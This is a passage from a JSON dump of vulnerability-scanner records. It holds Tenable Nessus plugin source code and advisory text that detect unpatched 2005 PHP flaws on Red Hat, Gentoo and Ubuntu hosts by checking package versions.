parse_str() function, and the script\ncan be forced to abort execution during operation (for example due to\nthe memory_limit setting), the register_globals may be enabled even if\nit is disabled in the PHP configuration file. This vulnerability only\naffects installations that have PHP scripts using the parse_str\nfunction in this way. (CVE-2005-3389)\n\nA Cross-Site Scripting flaw was found in the phpinfo() function. If a\nvictim can be tricked into following a malicious URL to a site with a\npage displaying the phpinfo() output, it may be possible to inject\nJavaScript or HTML content into the displayed page or steal data such\nas cookies. This vulnerability only affects installations which allow\nusers to view the output of the phpinfo() function. As the phpinfo()\nfunction outputs a large amount of information about the current state\nof PHP, it should only be used during debugging or if protected by\nauthentication. (CVE-2005-3388)\n\nA denial of service flaw was found in the way PHP processes EXIF image\ndata. It is possible for an attacker to cause PHP to crash by\nsupplying carefully crafted EXIF image data. (CVE-2005-3353)\n\nUsers of PHP should upgrade to these updated packages, which contain\nbackported patches that resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3353\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3388\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2005-3390\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2005:831\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2005:831\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"php-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-devel-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-imap-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-ldap-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-mysql-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-odbc-4.3.2-26.ent\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"php-pgsql-4.3.2-26.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mbstring-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.9\")) flag++;\n if (rpm_check(release:\"RHEL4\", reference:\"php-xmlrpc-4.3.9-3.9\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:25:43", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 4.4.1 or 5.0.6. Such versions fail to protect the\n'$GLOBALS' superglobals variable from being overwritten due to\nweaknesses in the file upload handling code as well as the 'extract()'\nand 'import_request_variables()' functions. Depending on the nature\nof the PHP applications on the affected host, exploitation of this\nissue may lead to any number of attacks, including arbitrary code\nexecution. \n\nIn addition, these versions may enable an attacker to exploit an\ninteger overflow flaw in certain certain versions of the PCRE library,\nto enable PHP's 'register_globals' setting even if explicitly disabled\nin the configuration, and to launch cross-site scripting attacks\ninvolving PHP's 'phpinfo()' function.", "edition": 26, "published": "2005-11-01T00:00:00", "title": "PHP < 4.4.1 / 5.0.6 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390", "CVE-2005-2491", "CVE-2002-0229"], "modified": "2005-11-01T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_4_4_1.NASL", "href": "https://www.tenable.com/plugins/nessus/20111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20111);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2002-0229\",\n \"CVE-2005-2491\",\n \"CVE-2005-3388\",\n \"CVE-2005-3389\",\n \"CVE-2005-3390\"\n );\n script_bugtraq_id(\n 14620,\n 15248,\n 15249,\n 15250\n );\n\n script_name(english:\"PHP < 4.4.1 / 5.0.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for multiple vulnerabilities in PHP < 4.4.1 / 5.0.6\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 4.4.1 or 5.0.6. Such versions fail to protect the\n'$GLOBALS' superglobals variable from being overwritten due to\nweaknesses in the file upload handling code as well as the 'extract()'\nand 'import_request_variables()' functions. Depending on the nature\nof the PHP applications on the affected host, exploitation of this\nissue may lead to any number of attacks, including arbitrary code\nexecution. \n\nIn addition, these versions may enable an attacker to exploit an\ninteger overflow flaw in certain certain versions of the PCRE library,\nto enable PHP's 'register_globals' setting even if explicitly disabled\nin the configuration, and to launch cross-site scripting attacks\ninvolving PHP's 'phpinfo()' function.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.hardened-php.net/advisory_182005.77.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.hardened-php.net/advisory_192005.78.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.hardened-php.net/advisory_202005.79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/release_4_4_1.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 4.4.1 / 5.0.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^3\\.\" ||\n version =~ \"^4\\.([0-3]\\.|4\\.0($|[^0-9]))\" || \n version =~ \"^5\\.0\\.[0-5]($|[^0-9])\"\n)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 4.4.1 / 5.0.6\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:00", "description": "The remote host is affected by the vulnerability described in GLSA-200511-08\n(PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been found and fixed in PHP:\n a possible $GLOBALS variable overwrite problem through file\n upload handling, extract() and import_request_variables()\n (CVE-2005-3390)\n a local Denial of Service through the use of\n the session.save_path option (CVE-2005-3319)\n an issue with\n trailing slashes in allowed basedirs (CVE-2005-3054)\n an issue\n with calling virtual() on Apache 2, allowing to bypass safe_mode and\n open_basedir restrictions (CVE-2005-3392)\n a problem when a\n request was terminated due to memory_limit constraints during certain\n parse_str() calls (CVE-2005-3389)\n The curl and gd modules\n allowed to bypass the safe mode open_basedir restrictions\n (CVE-2005-3391)\n a cross-site scripting (XSS) vulnerability in\n phpinfo() (CVE-2005-3388)\n \nImpact :\n\n Attackers could leverage these issues to exploit applications that\n are assumed to be secure through the use of proper register_globals,\n safe_mode or open_basedir parameters. Remote attackers could also\n conduct cross-site scripting attacks if a page calling phpinfo() was\n available. Finally, a local attacker could cause a local Denial of\n Service using malicious session.save_path options.\n \nWorkaround :\n\n There is no known workaround that would solve all issues at this\n time.", "edition": 24, "published": "2005-11-15T00:00:00", "title": "GLSA-200511-08 : PHP: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3054", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390"], "modified": "2005-11-15T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:php-cgi", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:php", "p-cpe:/a:gentoo:linux:mod_php"], "id": "GENTOO_GLSA-200511-08.NASL", "href": "https://www.tenable.com/plugins/nessus/20195", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200511-08.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20195);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-3054\", \"CVE-2005-3319\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\");\n script_xref(name:\"GLSA\", value:\"200511-08\");\n\n script_name(english:\"GLSA-200511-08 : PHP: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200511-08\n(PHP: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been found and fixed in PHP:\n a possible $GLOBALS variable overwrite problem through file\n upload handling, extract() and import_request_variables()\n (CVE-2005-3390)\n a local Denial of Service through the use of\n the session.save_path option (CVE-2005-3319)\n an issue with\n trailing slashes in allowed basedirs (CVE-2005-3054)\n an issue\n with calling virtual() on Apache 2, allowing to bypass safe_mode and\n open_basedir restrictions (CVE-2005-3392)\n a problem when a\n request was terminated due to memory_limit constraints during certain\n parse_str() calls (CVE-2005-3389)\n The curl and gd modules\n allowed to bypass the safe mode open_basedir restrictions\n (CVE-2005-3391)\n a cross-site scripting (XSS) vulnerability in\n phpinfo() (CVE-2005-3388)\n \nImpact :\n\n Attackers could leverage these issues to exploit applications that\n are assumed to be secure through the use of proper register_globals,\n safe_mode or open_basedir parameters. Remote attackers could also\n conduct cross-site scripting attacks if a page calling phpinfo() was\n available. Finally, a local attacker could cause a local Denial of\n Service using malicious session.save_path options.\n \nWorkaround :\n\n There is no known workaround that would solve all issues at this\n time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200511-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All PHP users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php\n All mod_php users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/mod_php\n All php-cgi users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose dev-php/php-cgi\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/15\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/10/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-php/php-cgi\", unaffected:make_list(\"rge 4.3.11-r5\", \"ge 4.4.0-r5\"), vulnerable:make_list(\"lt 4.4.0-r5\"))) flag++;\nif (qpkg_check(package:\"dev-php/php\", unaffected:make_list(\"rge 4.3.11-r4\", \"ge 4.4.0-r4\"), vulnerable:make_list(\"lt 4.4.0-r4\"))) flag++;\nif (qpkg_check(package:\"dev-php/mod_php\", unaffected:make_list(\"rge 4.3.11-r4\", \"ge 4.4.0-r8\"), vulnerable:make_list(\"lt 4.4.0-r8\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"PHP\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T15:27:42", "description": "Eric Romang discovered a local Denial of Service vulnerability in the\nhandling of the 'session.save_path' parameter in PHP's Apache 2.0\nmodule. By setting this parameter to an invalid value in an .htaccess\nfile, a local user could crash the Apache server. (CVE-2005-3319)\n\nA Denial of Service flaw was found in the EXIF module. By sending an\nimage with specially crafted EXIF data to a PHP program that\nautomatically evaluates them (e. g. a web gallery), a remote attacker\ncould cause an infinite recursion in the PHP interpreter, which caused\nthe web server to crash. (CVE-2005-3353)\n\nStefan Esser reported a Cross Site Scripting vulnerability in the\nphpinfo() function. By tricking a user into retrieving a specially\ncrafted URL to a PHP page that exposes phpinfo(), a remote attacker\ncould inject arbitrary HTML or web script into the output page and\npossibly steal private data like cookies or session identifiers.\n(CVE-2005-3388)\n\nStefan Esser discovered a vulnerability of the parse_str() function\nwhen it is called with just one argument. By calling such programs\nwith specially crafted parameters, a remote attacker could enable the\n'register_globals' option which is normally turned off for security\nreasons. Once this option is enabled, the remote attacker could\nexploit other security flaws of PHP programs which are normally\nprotected by 'register_globals' being deactivated. (CVE-2005-3389)\n\nStefan Esser discovered that a remote attacker could overwrite the\n$GLOBALS array in PHP programs that allow file uploads and run with\n'register_globals' enabled. Depending on the particular application,\nthis can lead to unexpected vulnerabilities. (CVE-2005-3390)\n\nThe 'gd' image processing and cURL modules did not properly check\nprocessed file names against the 'open_basedir' and 'safe_mode'\nrestrictions, which could be exploited to circumvent these\nlimitations. (CVE-2005-3391)\n\nAnother bypass of the 'open_basedir' and 'safe_mode' restrictions was\nfound in virtual() function. A local attacker could exploit this to\ncircumvent these restrictions with specially crafted PHP INI files\nwhen virtual Apache 2.0 hosts are used. (CVE-2005-3392)\n\nThe mb_send_mail() function did not properly check its arguments for\ninvalid embedded line breaks. By setting the 'To:' field of an email\nto a specially crafted value in a PHP web mail application, a remote\nattacker could inject arbitrary headers into the sent email.\n(CVE-2005-3883).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2006-01-21T00:00:00", "title": "Ubuntu 4.10 / 5.04 / 5.10 : php4, php5 vulnerabilities (USN-232-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "modified": "2006-01-21T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php5", "p-cpe:/a:canonical:ubuntu_linux:php4-domxml", "p-cpe:/a:canonical:ubuntu_linux:php4-common", "p-cpe:/a:canonical:ubuntu_linux:php4-mcal", "p-cpe:/a:canonical:ubuntu_linux:php4-mysql", "p-cpe:/a:canonical:ubuntu_linux:php5-mhash", "p-cpe:/a:canonical:ubuntu_linux:php5-curl", "p-cpe:/a:canonical:ubuntu_linux:php4", "p-cpe:/a:canonical:ubuntu_linux:php4-universe-common", "p-cpe:/a:canonical:ubuntu_linux:php5-mysql", "p-cpe:/a:canonical:ubuntu_linux:php5-cgi", "p-cpe:/a:canonical:ubuntu_linux:php4-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-odbc", "p-cpe:/a:canonical:ubuntu_linux:php5-sqlite", "p-cpe:/a:canonical:ubuntu_linux:php5-xmlrpc", "p-cpe:/a:canonical:ubuntu_linux:php4-pear", "cpe:/o:canonical:ubuntu_linux:5.04", "p-cpe:/a:canonical:ubuntu_linux:php5-gd", "p-cpe:/a:canonical:ubuntu_linux:php4-ldap", "p-cpe:/a:canonical:ubuntu_linux:php5-xsl", "p-cpe:/a:canonical:ubuntu_linux:php4-curl", "p-cpe:/a:canonical:ubuntu_linux:php5-sybase", "p-cpe:/a:canonical:ubuntu_linux:php5-dev", "p-cpe:/a:canonical:ubuntu_linux:php5-common", "p-cpe:/a:canonical:ubuntu_linux:php4-cgi", "p-cpe:/a:canonical:ubuntu_linux:php5-pgsql", "p-cpe:/a:canonical:ubuntu_linux:libapache-mod-php4", "cpe:/o:canonical:ubuntu_linux:4.10", "p-cpe:/a:canonical:ubuntu_linux:php4-odbc", "p-cpe:/a:canonical:ubuntu_linux:php4-recode", "p-cpe:/a:canonical:ubuntu_linux:php4-gd", "p-cpe:/a:canonical:ubuntu_linux:php4-mhash", "cpe:/o:canonical:ubuntu_linux:5.10", "p-cpe:/a:canonical:ubuntu_linux:php4-cli", "p-cpe:/a:canonical:ubuntu_linux:php5-ldap", "p-cpe:/a:canonical:ubuntu_linux:php5-recode", "p-cpe:/a:canonical:ubuntu_linux:libapache2-mod-php4", "p-cpe:/a:canonical:ubuntu_linux:php5", "p-cpe:/a:canonical:ubuntu_linux:php4-xslt", "p-cpe:/a:canonical:ubuntu_linux:php4-sybase", "p-cpe:/a:canonical:ubuntu_linux:php5-snmp", "p-cpe:/a:canonical:ubuntu_linux:php4-imap", "p-cpe:/a:canonical:ubuntu_linux:php4-pgsql", "p-cpe:/a:canonical:ubuntu_linux:php4-snmp", "p-cpe:/a:canonical:ubuntu_linux:php-pear"], "id": "UBUNTU_USN-232-1.NASL", "href": "https://www.tenable.com/plugins/nessus/20776", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-232-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20776);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2005-3319\", \"CVE-2005-3353\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\", \"CVE-2005-3883\");\n script_bugtraq_id(15248, 15249, 15250);\n script_xref(name:\"USN\", value:\"232-1\");\n\n script_name(english:\"Ubuntu 4.10 / 5.04 / 5.10 : php4, php5 vulnerabilities (USN-232-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Eric Romang discovered a local Denial of Service vulnerability in the\nhandling of the 'session.save_path' parameter in PHP's Apache 2.0\nmodule. By setting this parameter to an invalid value in an .htaccess\nfile, a local user could crash the Apache server. (CVE-2005-3319)\n\nA Denial of Service flaw was found in the EXIF module. By sending an\nimage with specially crafted EXIF data to a PHP program that\nautomatically evaluates them (e. g. a web gallery), a remote attacker\ncould cause an infinite recursion in the PHP interpreter, which caused\nthe web server to crash. (CVE-2005-3353)\n\nStefan Esser reported a Cross Site Scripting vulnerability in the\nphpinfo() function. By tricking a user into retrieving a specially\ncrafted URL to a PHP page that exposes phpinfo(), a remote attacker\ncould inject arbitrary HTML or web script into the output page and\npossibly steal private data like cookies or session identifiers.\n(CVE-2005-3388)\n\nStefan Esser discovered a vulnerability of the parse_str() function\nwhen it is called with just one argument. By calling such programs\nwith specially crafted parameters, a remote attacker could enable the\n'register_globals' option which is normally turned off for security\nreasons. Once this option is enabled, the remote attacker could\nexploit other security flaws of PHP programs which are normally\nprotected by 'register_globals' being deactivated. (CVE-2005-3389)\n\nStefan Esser discovered that a remote attacker could overwrite the\n$GLOBALS array in PHP programs that allow file uploads and run with\n'register_globals' enabled. Depending on the particular application,\nthis can lead to unexpected vulnerabilities. (CVE-2005-3390)\n\nThe 'gd' image processing and cURL modules did not properly check\nprocessed file names against the 'open_basedir' and 'safe_mode'\nrestrictions, which could be exploited to circumvent these\nlimitations. (CVE-2005-3391)\n\nAnother bypass of the 'open_basedir' and 'safe_mode' restrictions was\nfound in virtual() function. A local attacker could exploit this to\ncircumvent these restrictions with specially crafted PHP INI files\nwhen virtual Apache 2.0 hosts are used. (CVE-2005-3392)\n\nThe mb_send_mail() function did not properly check its arguments for\ninvalid embedded line breaks. By setting the 'To:' field of an email\nto a specially crafted value in a PHP web mail application, a remote\nattacker could inject arbitrary headers into the sent email.\n(CVE-2005-3883).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n 